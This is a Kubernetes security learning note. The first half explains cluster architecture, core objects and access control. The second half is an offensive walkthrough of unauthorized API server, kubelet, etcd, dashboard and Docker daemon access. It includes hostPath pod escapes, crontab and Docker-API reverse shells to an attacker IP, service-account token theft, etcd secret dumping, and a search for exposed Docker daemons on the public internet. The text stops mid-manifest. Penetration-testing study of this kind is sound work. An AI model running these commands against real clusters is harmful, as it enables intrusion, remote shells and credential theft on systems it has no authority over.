k8s security learning

1. Cloud

The definition of cloud may seem vague, but essentially it is a term for a global network of remote servers, each with a unique function. The cloud is not a physical entity: it is a vast global network of remote servers connected together and designed to operate as a single ecosystem. These servers store and manage data, run applications, and deliver content and services such as video clips, web mail, office productivity software, and social media. Files and data are accessed online from any Internet-enabled device rather than from a local or personal computer, so the information is available whenever and wherever it is needed.

Enterprises deploy cloud resources in four ways: a public cloud, which shares resources over the Internet and provides services to the public; a private cloud, which does not share resources and provides services over a private internal network, usually hosted on-premises; a hybrid cloud, which combines public and private clouds; and a community cloud, which shares resources only among a group of organizations, such as government agencies.

What is Cloud - Definition - Microsoft Azure

2. What is k8s

k8s is short for Kubernetes.
It is an open-source container orchestration system originally developed by Google that helps create and manage containerized applications.
An example: when there are too many Docker containers to handle, manual administration becomes very troublesome, so we can use k8s to simplify that management.

0x00 Brief description of K8S architecture

As noted above, K8S is a system for managing containerized applications. This section focuses on the architecture and working principles of K8S.

The following figure is an overview of the K8S architecture:

kubectl is a k8s client tool that can manage clusters using the command line

A k8s cluster mainly consists of a small number of master nodes and multiple corresponding Node (worker) nodes. The master controls and manages the Node nodes, and a k8s cluster must have at least one master node.

The Master node contains several components, mainly the following:

etcd:
Stores configuration information available to the nodes in the cluster. It is a highly available key-value store that can be distributed across multiple nodes. Because it may hold sensitive information, only the Kubernetes API server should access it directly. In short: it stores cluster and node state.

API server:
The API server exposes the Kubernetes API and provides all operations on the cluster through it. Because it implements a well-defined interface, different tools and libraries can easily communicate with it; a kubeconfig, together with the client tools, is used for that communication. In short: the hub that receives and parses request commands.

Controller Manager:
This component regulates the state of the cluster and performs most of the collection tasks. It can be thought of as a daemon running in a non-terminating loop that collects information, sends it to the API server, watches the shared state of the cluster, and makes changes to drive the current state toward the desired state. Key controllers include the Replication Controller, Endpoint Controller, Namespace Controller, and Service Account Controller; the controller manager runs these different controllers to handle nodes, endpoints, and so on. In short: it maintains k8s resources.

Scheduler:
One of the key components of the Kubernetes master. It is the master-side service responsible for distributing workloads: it tracks workload utilization on the cluster nodes and places workloads on nodes with available resources. In other words, it is the mechanism that assigns pods to available nodes. In a nutshell: a load-balancing scheduler.

A Node also contains several components, mainly the following:

Docker:
The container engine, the basic environment in which containers run.

kubelet:
Runs on every Node; it executes resource-operation instructions and is responsible for maintaining the Pods on its node.

kube-proxy:
A proxy service used for load balancing traffic across multiple pods.

fluentd:
A log collection service.

pod:
The pod is the smallest service unit in k8s; containers live inside pods, and k8s operates containers by operating pods. A Node can host multiple Pods.

The Pod can be called the core part of a Node. A Pod is itself a kind of container, a "container for packaging containers": it often holds multiple containers, and those containers share a virtual environment, including network and storage resources.

The resource sharing and interaction among these containers is handled by the pause container in the pod; a pause container is created whenever a pod is initialized.
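On a Docker-based node you can observe these pause containers directly. A quick check (assuming Docker is the container runtime on the node):

# every running pod has a corresponding pause (sandbox) container on its node
docker ps | grep pause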

0x01 K8S workflow

The general process of issuing client commands is as follows:

  1. kubectl sends a deployment request to the apiserver (e.g. using kubectl create -f deployment.yml)
  2. The apiserver persists the Deployment to etcd; etcd and the apiserver communicate over HTTP.
  3. The controller manager listens to the apiserver through the watch API. When the deployment controller sees a newly created Deployment object, it pulls it from its queue, creates a ReplicaSet according to the Deployment's description, returns the ReplicaSet object to the apiserver, and persists it back to etcd.
  4. The scheduler then sees the unscheduled pod object, selects a schedulable node according to its scheduling rules, fills it into the nodeName field of the pod description, and returns the pod object to the apiserver, which writes it to etcd.
  5. The kubelet that sees the pod object's nodeName field matching its own node pulls it from its queue and creates the containers described in the pod through the container runtime.
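You can watch this chain happen end to end. A minimal sketch (assuming a deployment.yml like the nginx example later in this section):

kubectl apply -f deployment.yml
# watch the ReplicaSet and Pods appear and get scheduled onto nodes
kubectl get deploy,rs,pods -o wide --watch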

0x02 Build K8S

See "K8S Environment Construction.md"

0x03 The basic concept of k8S

Kubernetes tutorial | Kuboard (very good Chinese tutorial)

Learn the basics of Kubernetes | Kubernetes (the official k8s tutorial, with an interactive interface; a minor downside is that some parts lack Chinese)

The following content comes from https://kuboard.cn/learning/k8s-basics/kubernetes-basics.html

Deployment

A Worker node (Node) is a VM (virtual machine) or physical computer that serves as a worker machine in the k8s cluster.

By publishing a Deployment, you can create an instance (docker container) of an application (docker image) in k8s. That instance is wrapped in a Pod, which is the smallest manageable unit in k8s.

After a Deployment is published to the k8s cluster, it instructs k8s how to create and update application instances, and the master node schedules those instances onto specific nodes in the cluster.

Once application instances are created, the Kubernetes Deployment Controller continuously monitors them. If the worker node running an instance shuts down or is deleted, the controller recreates the instance on another worker node in the cluster that has resources available. This provides a self-healing mechanism for machine failure and maintenance.

In the pre-container-orchestration era, setup scripts were commonly used to start applications, but they could not recover an application after a machine failure. By both creating application instances and maintaining their number across cluster nodes, Kubernetes Deployments provide a fundamentally different way to manage applications.

Related commands:

kubectl is a k8s client tool that can manage clusters using the command line

kubectl cheat sheet: kubectl cheat sheet | Kubernetes

# view Deployments
kubectl get deployments

# view Pods
kubectl get pods

# deploy from a yaml file
kubectl apply -f nginx-deployment.yaml

A yaml file looks like this: (nginx-deployment.yaml)

apiVersion: apps/v1  # depends on the k8s cluster version; use `kubectl api-versions` to list supported versions
kind: Deployment     # the type of this object; here we use a Deployment
metadata:            # metadata: basic attributes and information of the Deployment
  name: nginx-deployment  # name of the Deployment
  labels:            # labels flexibly identify one or more resources; keys and values are user-defined, and multiple labels are allowed
    app: nginx       # give this Deployment a label with key "app" and value "nginx"
spec:                # the description of this Deployment: how you expect it to behave in k8s
  replicas: 1        # create one application instance from this Deployment
  selector:          # label selector; works together with the labels above
    matchLabels:     # select resources that carry the label app: nginx
      app: nginx
  template:          # template for the Pods to select or create
    metadata:        # Pod metadata
      labels:        # Pod labels; the selector above matches Pods carrying app: nginx
        app: nginx
    spec:            # desired behavior of the Pod (what to deploy in it)
      containers:    # containers to create; the same kind of container as in docker
      - name: nginx  # container name
        image: nginx:1.7.9  # create the container from image nginx:1.7.9; port 80 is reachable by default

Pods and Nodes

A Pod (container group) is an abstraction in k8s that holds a group of containers (one or more) together with the resources shared by those containers. These resources include:

  • Shared storage, called volumes (Volumes)
  • Network: each Pod (container group) has a unique IP within the cluster, shared by all containers in the Pod
  • Basic information about each container, such as its image version and the ports it exposes

The Pod is the most basic unit in the cluster.

A Node in the figure below contains 4 Pods (container groups).

Pods always run on Nodes. A Node is a machine in the kubernetes cluster, either a virtual machine or a physical machine, and each Node is managed by the master. A Node can host multiple Pods; the kubernetes master automatically schedules Pods onto the best Node based on the resources available on each Node.

The status of a Node roughly includes the following:

  • Addresses: addresses

  • Conditions: status (the conditions field describes the status of all Running nodes)

  • Capacity and Allocatable: Capacity and allocatable, describing the available resources on the node: CPU, memory, and the upper limit of the number of Pods that can be scheduled to the node.

  • Info : General information about the node, such as kernel version, Kubernetes version (kubelet and kube-proxy version), Docker version (if used), and OS name. This information is collected by the kubelet from the nodes.

  • HostName: set by the kernel of the node. Can be overridden by kubelet's --hostname-override parameter.

  • ExternalIP: Typically the node's externally routable (reachable from outside the cluster) IP address.

  • InternalIP: Typically the node's IP address that is only routable inside the cluster.

  • Ready: True if the node is healthy and ready to accept Pods; False if the node is unhealthy and cannot accept Pods; Unknown if the node controller has not heard from the node within the latest node-monitor-grace-period (default 40 seconds)

  • DiskPressure: True if the node's free disk space is too low to add new Pods; otherwise False

  • MemoryPressure: True if the node is under memory pressure, i.e. available memory is low; otherwise False

  • PIDPressure: True if the node is under process pressure, i.e. there are too many processes on the node; otherwise False

  • NetworkUnavailable: True if the node's network is misconfigured; otherwise False

    Related commands:

    # list resources of type Pod
    kubectl get pods
    
    # list resources of type Node
    kubectl get nodes
    
    # kubectl describe <resource type> <resource name>
    
    # show information about the Pod named nginx-XXXXXX
    kubectl describe pod nginx-XXXXXX 
    
    # show information about the Deployment named nginx
    kubectl describe deployment nginx
    
    # print logs of the container in the Pod named nginx-pod-XXXXXXX
    kubectl logs -f podname
    
    # run a command inside a Pod
    kubectl exec -it nginx-pod-xxxxxx /bin/bash
    

Service

https://kuboard.cn/learning/k8s-basics/expose.html#kubernetes-service-service-overview

From the above we know that the Pods backing an application change constantly, and each Pod has a different IP; yet for front-end users, the application's access address should stay the same.

k8s therefore provides a mechanism, the Service, that shields the front end from the IP changes caused by back-end Pod changes.

A Service defines a unified way to access a set of Pods that share the same characteristics (an application's Pods change constantly, but they keep the same characteristics no matter how they change).

A Service uses a label selector (LabelSelector) to identify which Pods share those characteristics (Pods carrying a specific Label; Labels are user-defined and exist on all K8S objects, not just Pods) and groups them into a container group.

A Service can expose the application's entry point in three ways, set through the spec.type value of the Service in the application's configuration file (a minimal manifest sketch follows the list below):

  • ClusterIP (default)

    Publishes the service on an internal IP of the cluster. A Service of this type is only reachable from inside the cluster.

  • NodePort

    Exposes the service on the same port of every Node in the cluster using NAT, so the service can be reached from outside via any node in the cluster at <NodeIP>:<NodePort>. The ClusterIP access mode remains available.

  • LoadBalancer

    Creates a load balancer outside the cluster in the cloud environment (requires cloud-provider support) and uses the load balancer's IP address as the access address of the service. The ClusterIP and NodePort access modes remain available.
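A minimal NodePort Service sketch (assuming the nginx Deployment shown earlier; names and port values are illustrative):

apiVersion: v1
kind: Service
metadata:
  name: nginx-service
spec:
  type: NodePort        # expose on <NodeIP>:<NodePort>; the default type is ClusterIP
  selector:
    app: nginx          # route to Pods labeled app: nginx
  ports:
  - port: 80            # the Service (ClusterIP) port
    targetPort: 80      # the container port
    nodePort: 30080     # the port opened on every node (30000-32767)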

In the figure below there are two services, Service A (yellow dotted line) and Service B (blue dotted line). Service A forwards requests to the Pod with IP 10.10.10.1, and Service B forwards requests to the Pods with IPs 10.10.10.2, 10.10.10.3, and 10.10.10.4.

A Service routes external requests to a set of Pods, providing an abstraction layer that lets Kubernetes dynamically reschedule container groups (recreating container groups after failures, scaling the number of container groups behind a Deployment up or down, and so on) without affecting the service's callers.

Each node runs a kube-proxy service, which the Service uses to route connections to Pods.

Scaling applications

You can set the number of running Pods by changing the replicas field in the Deployment configuration file.

Earlier we created a Deployment and then provided access to its Pods through a Service. The Deployment we published created only a single Pod to run our application. When traffic grows and the load on the application's Pods increases, we need to scale the application by increasing the number of Pods to spread the load; incoming traffic is then load-balanced across the Pods.

Scaling can be achieved by changing the replicas (number of replicas) value in the nginx-deployment.yaml file:

spec:
  replicas: 2    # create two application instances from this Deployment
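The same effect can be achieved imperatively; a quick sketch:

# scale the Deployment to 2 replicas without editing the yaml
kubectl scale deployment nginx-deployment --replicas=2
kubectl get pods -o wide   # two nginx Pods, possibly on different nodes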

Performing a rolling update (Rolling Update)

When we want to upgrade a deployed program without stopping it, we can use a rolling update.

Rolling updates achieve zero-downtime upgrades by gradually replacing Pods of the old version with Pods of the new version.

Rolling update is the default update strategy in K8S.
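A short sketch of triggering and watching a rolling update (the image tag is illustrative):

# change the container image; k8s replaces the Pods gradually
kubectl set image deployment/nginx-deployment nginx=nginx:1.8
kubectl rollout status deployment/nginx-deployment
# roll back if the new version misbehaves
kubectl rollout undo deployment/nginx-deployment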

0x04 k8s user

There are two types of users in a Kubernetes cluster: service accounts managed by Kubernetes, and ordinary users.

  • A service account is an account managed by the Kubernetes API. Service accounts are bound to a specific namespace and are created automatically by the API server or manually through API calls. A service account is associated with a set of credentials stored in a Secret; these credentials are mounted into pods, allowing the pods to call the kubernetes API. (For the use of service accounts, see the k8s security section.)
  • User account: generally refers to an account managed by a service independent of Kubernetes, such as keys distributed by administrators, a user store (account library) such as Keystone, or even a file of usernames and passwords. Kubernetes has no objects representing such accounts, so they cannot be added to the Kubernetes system directly.

0x05 k8s access control process (security mechanism)

For details, refer to the notes "k8s access control process (security mechanism).md"

All API requests in k8s must go through a single gateway, the apiserver component, which is the only access entry to the cluster. Its main security functions are API authentication, authorization, and admission control.

Three mechanisms:

  • Authentication : identity verification. Checks whether the user is legitimate, e.g. via client certificates, passwords, bootstrap tokens, JWT tokens, etc.
  • Authorization : permission checking. Determines whether the user is allowed to perform the operation. k8s supports Node, RBAC (Role-Based Access Control), ABAC, webhook and other mechanisms; RBAC is the mainstream choice.
  • Admission Control : the last step of a request, generally used to extend functionality, e.g. checking whether pod resources are configured and whether a yaml configuration complies with security policy. Usually implemented with admission webhooks.

Note: authentication and authorization apply only to the HTTPS API. In other words, if a client connects to the kube-apiserver over HTTP, no authentication or authorization is performed.

k8s authentication

X509 client certs

Client certificate authentication. X509 is a digital certificate format standard; it is the default, most widely used, and safest authentication method in kubernetes. When the api-server starts, it is given a CA certificate and CA private key; any client presenting an x509 certificate issued by that same CA is considered a trusted client. Clusters installed with kubeadm use this certificate-based authentication method.

Users typically generate their kubeconfig via X509 client certs.

Service Account Tokens

Because x509-based authentication is relatively complicated, it is not well suited to managing pods inside the k8s cluster. Service Account Tokens are the authentication method used by service accounts, which define what permissions a pod should have. A pod is associated with a service account, and the service account's credential (token) is placed in the filesystem tree of each container in the pod, at /var/run/secrets/kubernetes.io/serviceaccount/token

A service account mainly contains three items: namespace, token and ca (a quick look inside a pod follows the list):

  • namespace: specifies the namespace the pod belongs to
  • token: the token used for authentication
  • ca: the certificate used to verify the apiserver
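Inside any pod you can inspect these mounts directly; a minimal sketch:

# the service account credential is mounted into every container by default
ls /var/run/secrets/kubernetes.io/serviceaccount/
# ca.crt  namespace  token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace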

k8s authorization

K8S currently supports the following four authorization mechanisms:

  • Node
  • ABAC
  • RBAC
  • Webhook

Specifically, there are six authorization modes:

  • The Attribute-Based Access Control (ABAC) mode lets you configure policies using local files.
  • The Role-Based Access Control (RBAC) mode lets you create and store policies using the Kubernetes API.
  • WebHook is an HTTP callback mode that lets you manage authorization using a remote REST endpoint.
  • Node authorization is a special-purpose mode that authorizes API requests made by kubelets.
  • AlwaysDeny blocks all requests. Use this flag only for testing.
  • AlwaysAllow allows all requests. Use this flag only if you do not need authorization of API requests.

Multiple authorization modules can be enabled at once. Modules are checked in order, so earlier modules have higher priority to allow or deny a request.

Since version 1.6, Kubernetes enables the RBAC access control policy by default; RBAC has been a stable feature since 1.8.
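A minimal RBAC sketch (all names are illustrative): a Role that can only read pods, bound to a service account, then verified.

# create a role that can only get/list/watch pods in the default namespace
kubectl create role pod-reader --verb=get,list,watch --resource=pods -n default
# bind it to a service account (assumed to exist) named mysa
kubectl create rolebinding read-pods --role=pod-reader --serviceaccount=default:mysa -n default
# verify what the account can and cannot do
kubectl auth can-i list pods -n default --as=system:serviceaccount:default:mysa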

3. K8S attack matrix

CDK is a penetration testing tool tailored for container environments. It provides zero-dependency common commands and PoC/EXPs for use inside a compromised container, and integrates escape, lateral movement, and persistence techniques unique to Docker/K8s scenarios, along with plug-in management.

https://github.com/cdk-team/CDK

The following figure shows a K8S attack matrix.

This article follows this framework and describes a number of useful attack techniques.

0x00 Information collection in the k8s environment

Information collection depends on our attack scenario, i.e. the starting point from which we entered the intranet. Generally an intranet is not built entirely on container technology, so the starting point can be divided into two cases: a container with restricted permissions, or the intranet of a physical host.

The internal cluster network of K8s relies on network plug-ins; currently the most widely used are Flannel and Calico.

There are mainly 4 types of communication:

  • Inter-container communication within the same Pod
  • Pod-to-Pod communication
  • Pod-to-Service communication
  • Communication between traffic from outside the cluster and Services

When our starting point is a container with limited permissions inside the k8s cluster, the situation is not much different from regular intranet penetration: upload a port scanning tool and probe.

Common ports of k8s

In a k8s environment, these are the ports worth close attention during intranet reconnaissance (exploitation of each port is expanded below):

kube-apiserver: 6443, 8080
kubectl proxy: 8080, 8081
kubelet: 10250, 10255, 4149
dashboard: 30000
docker api: 2375
etcd: 2379, 2380
kube-controller-manager: 10252
kube-proxy: 10256, 31442
kube-scheduler: 10251
weave: 6781, 6782, 6783
kubeflow-dashboard: 8080
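A quick probe sketch for these ports (the target range is illustrative):

# sweep a subnet for common k8s component ports (a subset of the list above)
nmap -p 2375,2379,2380,6443,8080,10250,10255,10251,10252,10256,30000 --open 192.168.11.0/24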

0x01 Initial access

1. Cloud account AK leaked

In today's cloud environments, business code that wants to talk to cloud services must authenticate with an accesskey; only after authentication can it communicate with the cloud service.
Roughly speaking, where a person accessing a service provides a password, code accessing a cloud service API provides an accesskey.
If an accesskey leaks, we can use it to communicate with the cloud services, bounce a shell back from a cloud host, and use that host as the entry point to work our way in.

The following articles discuss accesskey security in cloud-native environments in more detail; reading them gives a deeper understanding of the accesskey concept.

Discussion on cloud security due to access key leak- FreeBuf Network Security Industry Portal

Remember an Alibaba Cloud host leaked the Access Key to Getshell - FreeBuf Network Security Industry Portal

2. Malicious images

In docker, containers are built from images. If a pulled image is malicious, or the pulled image itself has security vulnerabilities, it introduces security risks.

The picture below shows a malicious mining image deployed on dockerhub; it downloads mining malware from github and starts mining.

3. API Server unauthorized access (8080, 6443)

This is a classic K8S vulnerability.

Recall the role of the API Server: it provides the APIs used to control the interior of the cluster. If we can control the API Server, we can use kubectl to create Pods and use the disk-mount technique to take control of Node nodes. (The technique of obtaining a node shell via disk mounting is discussed in detail in a later section.)

The API Server can serve externally on two ports: 8080 (insecure-port) and 6443 (secure-port). Port 8080 provides HTTP without authentication, while port 6443 provides HTTPS with identity authentication (neither port number is fixed; both are set in the configuration files).

insecure-port open

The service the API Server opens on port 8080 is meant for testing, but if it is exposed in a production environment, attackers can use this port to attack the cluster.

However, the prerequisites for exploiting the API Server's port 8080 are somewhat demanding (a misconfiguration plus an older version): the port 8080 service is not started by default, but if the user has set --insecure-port=8080 in /etc/kubernetes/manifests/kube-apiserver.yaml, there is a security risk.

Note: this option has been disabled since version 1.20.

Environmental prerequisites:

step 1: cd /etc/kubernetes/manifests/
step 2: edit kube-apiserver.yaml
	add: - --insecure-port=8080
	add: - --insecure-bind-address=0.0.0.0

The kubelet watches this file for changes: after you modify /etc/kubernetes/manifests/kube-apiserver.yaml, the kubelet automatically terminates the original kube-apiserver-{nodename} Pod and creates a replacement Pod that uses the new configuration parameters.

Restart the service:

systemctl daemon-reload
systemctl restart kubelet

In real environments, because port 8080 is so common, this risk point is often overlooked in internal reviews.

Usage

Environmental information:

A cluster consists of three nodes, including a control node and two worker nodes

  • K8s-master 192.168.11.152
  • K8s-node1 192.168.11.153
  • K8s-node2 192.168.11.160

Attacker machine (Kali)

  • 192.168.11.128

Direct access to port 8080 will return a list of available APIs:

Use kubectl, specifying the IP and port, to call the API Server that has the unauthorized-access vulnerability.

If you don't have kubectl, install it first; refer to the official documentation:

Use kubectl to get cluster information:

kubectl -s ip:port get nodes

Note: if your kubectl version is newer than the server's, an error may occur and you will need to downgrade kubectl.

Then create a yaml file on the attacker machine to create a container, mounting the root directory of the node into the /mnt directory of the container. The content is as follows:

apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: nginx
    name: test-container
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /

Then use kubectl to create the container. Note that this way we cannot specify which node the pod is created on.

kubectl -s 192.168.11.152:8080 create -f test.yaml
kubectl -s 192.168.11.152:8080 --namespace=default exec -it test bash


Write a cron job into the mounted filesystem to get a reverse shell:

echo -e "* * * * * root bash -i >& /dev/tcp/192.168.11.128/4444 0>&1\n" >> /mnt/etc/crontab

Wait a moment and we obtain node02 node permissions:


Alternatively, you can take control of the host by writing SSH public/private keys.

If the apiserver has a dashboard configured, pods can also be created directly through the UI.

secure-port misconfiguration

If we access the API server's secure-port without any credentials, the server treats us as the system:anonymous user by default.

Generally the system:anonymous user has very low privileges, but if operations staff misconfigure things and bind system:anonymous to the cluster-admin group, the secure-port then allows anonymous users to issue commands to the cluster with administrator privileges (in a sense, the secure-port becomes an insecure-port).
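For reference, the dangerous binding looks something like this (a sketch; do not do this outside a lab):

# bind the anonymous user to cluster-admin: this is the misconfiguration itself
kubectl create clusterrolebinding anonymous-admin --clusterrole=cluster-admin --user=system:anonymous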

Usage

Method One

kubectl -s https://192.168.111.20:6443/ --insecure-skip-tls-verify=true get nodes

# (192.168.111.20:6443 is the secure-port of the apiserver on the master node.) When prompted for a username and password, type anything.

Normally it looks like this:

But if the secure-port is misconfigured to allow unauthorized access, it looks like this:

Method Two

Use the cdk tool to try to log in through the anonymous account "system:anonymous":

./cdk kcurl anonymous get "https://192.168.11.152:6443/api/v1/nodes"

Create a privileged container:

The subsequent attack method is the same as above

4. k8s configfile leaked

The k8s configfile may contain sensitive information such as api-server login credentials. If the contents of a cluster's configfile are obtained (e.g. leaked on github), the impact on the cluster's internal security is huge.

Here is a picture from the Aliyun community

5. Application vulnerability intrusion inside the container

As the name implies, a vulnerable application inside a container (for example, a tomcat instance with an RCE vulnerability) lets a hacker obtain a shell in the Pod and use it as the entry point.

6. docker.sock utilization

Docker works in a server-client model: the server is called the Docker daemon and the client is called the docker client.
When you run a docker command, the docker client communicates with the Docker daemon through the docker.sock file; in other words, the Docker daemon is managed through docker.sock (creating containers, executing commands in containers, querying container status, and so on).
The Docker daemon can also be configured to expose docker.sock on a network port: generally port 2375 for unauthenticated HTTP communication and port 2376 for trusted HTTPS communication.

Public network exposure (2375) (Docker Daemon)

If the docker daemon's port 2375 is exposed on the public network, you can use this port to control the docker containers directly and obtain host permissions by creating a new container with the disk-mount technique.

fofa search

server="Docker" && port="2375"

Many Docker daemons are indeed exposed on the public network;

we pick one to test the waters.

The API is called successfully and returns container status.

Then we can execute a command inside a specified container with the following request:

curl -X POST "http://ip:2375/containers/{container_id}/exec" -H "Content-Type: application/json" --data-binary '{"Cmd": ["bash", "-c", "bash -i >& /dev/tcp/xxxx/1234 0>&1"]}'

This returns an exec id.

Then request that id to start the exec and run the command:

curl -X POST "http://ip:2375/exec/{id}/start" -H "Content-Type: application/json" --data-binary "{}"

Like this: (picture quoted from freebuf)

Directly use an existing docker.sock

If we compromise a docker container that contains docker.sock (common path /var/run/docker.sock), we can use that file directly to control the docker daemon.

Just take the commands from the previous section and add a --unix-socket parameter:

curl -s --unix-socket /var/run/docker.sock -X POST "http://docker_daemon_ip/containers/{container_id}/exec" -H "Content-Type: application/json" --data-binary '{"Cmd": ["bash", "-c", "bash -i >& /dev/tcp/xxxx/1234 0>&1"]}'

curl -s --unix-socket /var/run/docker.sock -X POST "http://docker_daemon_ip/exec/{id}/start" -H "Content-Type: application/json" --data-binary "{}"

Normally docker.sock lives on the docker daemon's host, but if developers want to run docker commands inside a docker container, they must mount the host's docker.sock into the container, which gives us a docker escape opportunity.
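With the docker CLI available inside such a container, the classic escape is a one-liner; a sketch (the image name is illustrative):

# talk to the host daemon through the mounted socket and start a container
# that mounts the host's root filesystem, then chroot into it
docker -H unix:///var/run/docker.sock run -it --rm -v /:/host alpine chroot /host /bin/sh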

Practical case

Detection and utilization of Docker Daemon unauthorized access:

# probe for unauthorized access
curl http://192.168.238.129:2375/info
docker -H tcp://192.168.238.129:2375 info


# this way is recommended: easier to operate
export DOCKER_HOST="tcp://192.168.238.129:2375" 

Docker Daemon unauthorized combat cases:

7. Kubelet unauthorized access (10250/10255)

Impact:

  • Direct control of all pods on the node
  • Searching for privileged containers and obtaining their Tokens
  • If a high-privilege token can be obtained from a pod, the whole cluster can be taken over directly.

What is the difference between kubelet and kubectl?

The kubelet manages the local Pods on its Node, while kubectl manages the cluster. kubectl issues instructions to the cluster, and the kubelet on each Node manages its local Pods after receiving the instructions.

The Kubelet API generally listens on two ports: 10250 and 10255. Port 10250 is read-write, while port 10255 is read-only.

The kubelet API listens on port 10250 by default and runs on every Node in the cluster. The kubelet configuration file on the node is /var/lib/kubelet/config.yaml.
We focus on two options in this file: the first sets whether the kubelet API allows anonymous access; the second sets whether kubelet API requests must be authorized through the API server (so that even if anonymous users can connect, they have no permissions).

By default the kubelet configuration looks as in the figure above; if we access the kubelet API port directly, authentication fails.

In the configuration file, change authentication.anonymous.enabled to true and authorization.mode to AlwaysAllow, then restart the kubelet with systemctl restart kubelet; the kubelet API is now open to unauthorized access.

The possible authorization-mode values are as follows:

--authorization-mode=ABAC         Attribute-Based Access Control mode: configure policies using local files.
--authorization-mode=RBAC         Role-Based Access Control mode: create and store policies using the Kubernetes API.
--authorization-mode=Webhook      An HTTP callback mode: manage authorization with a remote REST endpoint.
--authorization-mode=Node         A special-purpose mode that authorizes API requests made by kubelets.
--authorization-mode=AlwaysDeny   Blocks all requests. Use only for testing.
--authorization-mode=AlwaysAllow  Allows all requests. Use only if you do not need authorization of API requests.

Once we find an unauthorized kubelet, we can do the following to obtain an entry point.

Execute commands in Pod

If the kubelet allows unauthorized access, the following command executes a command in a Pod:

curl -XPOST -k https://node_ip:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=command"

The parameters can be obtained from https://node_ip:10250/pods (an extraction sketch follows this list):

  • The value under metadata.namespace is namespace
  • The value under metadata.name is pod_name
  • The name value under spec.containers is container_name
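A quick way to enumerate the namespace/pod/container triples (assuming jq is available on the attacking host):

curl -sk https://node_ip:10250/pods | jq -r '.items[] | .metadata.namespace + "/" + .metadata.name + "/" + .spec.containers[].name'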

The command output is echoed directly in the response, which is very convenient.

Get the service account credentials in the container

If you can execute commands in the Pod, you can obtain the Pod's service account credentials and use them to act as that service account. For specific usage see the later section: [Use Service Account to connect to API Server to execute instructions](#Use Service Account to connect to API Server to execute instructions)

Example of use

Environmental information:

A cluster consists of three nodes, including a control node and two worker nodes

  • K8s-master 192.168.11.152
  • K8s-node1 192.168.11.153
  • K8s-node2 192.168.11.160

Attacker machine (Kali)

  • 192.168.11.128

Visit https://192.168.11.160:10250/pods; if the following data appears, the kubelet can be exploited:

To execute commands in a container, we first need to determine the namespace, pod_name, and container_name parameters to locate the container.

  • The value under metadata.namespace is namespace
  • The value under metadata.name is pod_name
  • The name value under spec.containers is container_name

Here you can quickly find the privileged container by retrieving the securityContext field

Execute a command in the corresponding container to obtain its token, which can be used for Kubernetes API authentication. Kubernetes uses RBAC authorization by default (when you use the kubectl command, the underlying layer actually calls the Kubernetes API with certificate authentication).

By default the token is stored in the pod at /var/run/secrets/kubernetes.io/serviceaccount/token

curl -k -XPOST "https://192.168.11.160:10250/run/kube-system/kube-flannel-ds-dsltf/kube-flannel" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

If the token mounted in the pod has permission to create pods, you can use it against the cluster API to create a privileged container, escape to the host through that privileged container, and thereby gain cluster-node permissions.

kubectl --insecure-skip-tls-verify=true --server="https://192.168.11.152:6443" --token="eyJhb....." get pods

The next step is to mount the directory by creating a pod, and then use crontab to get the shell.

8. etcd Unauthorized (2379)

etcd is the database component of the k8s cluster. It listens on port 2379 by default and is protected by certificate authentication by default. It mainly stores node information, such as tokens and certificates. If port 2379 allows unauthorized access, you can query an administrator token from etcd and then use that token against the api server to take over the cluster.

There are two etcd API versions, v2 and v3; k8s uses v3, so we set ETCDCTL_API=3 to specify the etcd version when accessing etcd.

To exploit unauthorized etcd access we need the etcdctl tool, which is used to manage the etcd database; it can be downloaded from github:

Releases · etcd-io/etcd · GitHub

"When starting etcd, if the --client-cert-auth parameter is not specified to enable certificate verification, and access control is not implemented through iptables/firewall, etcd's interface and data will be directly exposed to external hackers" - iQIYI Security Emergency Response Center

Usage

Download etcd: Releases etcd-io/etcd GitHub

After decompression, enter the etcd directory on the command line.

etcdctl api version switching:

export ETCDCTL_API=2
export ETCDCTL_API=3

Detect unauthorized access to the Client API:

etcdctl --endpoints=https://172.16.0.112:2379 get / --prefix --keys-only

If we access port 2379 directly without certificate files, etcd cannot be used and an X509 certificate error is returned.

We need to point the following environment variables at the files (ca, key, cert) to gain access (if unauthorized access is enabled, no certificate is needed):

export ETCDCTL_CERT=/etc/kubernetes/pki/etcd/peer.crt
export ETCDCTL_CACERT=/etc/kubernetes/pki/etcd/ca.crt
export ETCDCTL_KEY=/etc/kubernetes/pki/etcd/peer.key

Or execute directly:

etcdctl --insecure-skip-tls-verify --insecure-transport=true --endpoints=https://172.16.0.112:2379 --cacert=ca.pem --key=etcd-client-key.pem --cert=etcd-client.pem endpoint health

Query administrator token

We can directly query the administrator's token in etcd, and then use the token to cooperate with the kubectl command to take over the cluster.

etcdctl --endpoints=https://etcd_ip:2379/ get / --prefix --keys-only | grep /secrets/

If the query results contain a sensitive account, we can fetch its token:

etcdctl --endpoints=https://etcd_ip:2379/ get /registry/secrets/default/admin-token-55712

After getting the token, use kubectl to take over the cluster

kubectl --insecure-skip-tls-verify -s https://master_ip:6443/ --token="xxxxxx" get nodes

kubectl --insecure-skip-tls-verify -s https://master_ip:6443/ --token="xxxxxx" -n kube-system get pods

You can also try to dump the etcd database and find sensitive information

ETCDCTL_API=3 ./etcdctl --endpoints=http://IP:2379/ get / --prefix --keys-only

If the server has https enabled, you need to add two parameters to ignore certificate verification --insecure-transport --insecure-skip-tls-verify

ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379/ get / --prefix --keys-only

9. Private image registry exposed

If many of an enterprise's cloud applications are built from self-built private images, and one day those private images leak, we can use auditing and other techniques to dig out vulnerabilities in them, resulting in a supply chain attack.

10. Dashboard unauthorized access

The Dashboard is the official graphical interface for controlling Kubernetes. When a Kubernetes misconfiguration leaves the dashboard open to unauthorized access, we can control the entire cluster through it. The typical conditions are:

  • enable-skip-login is enabled, so a user can click Skip on the login page and enter the dashboard without logging in.
  • cluster-admin (the role with the highest cluster administration authority) is bound to Kubernetes-dashboard.

Usage

With the default configuration, login requires a Token and cannot be skipped.

However, if the following argument is added to the startup parameters, the Token step can be skipped during login:

- --enable-skip-login

Clicking Skip enters the dashboard using the ServiceAccount of Kubernetes-dashboard. If that ServiceAccount has not been given special permissions, you cannot control any cluster functions by default.

Bind cluster-admin to Kubernetes-dashboard:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: dashboard-1
subjects:
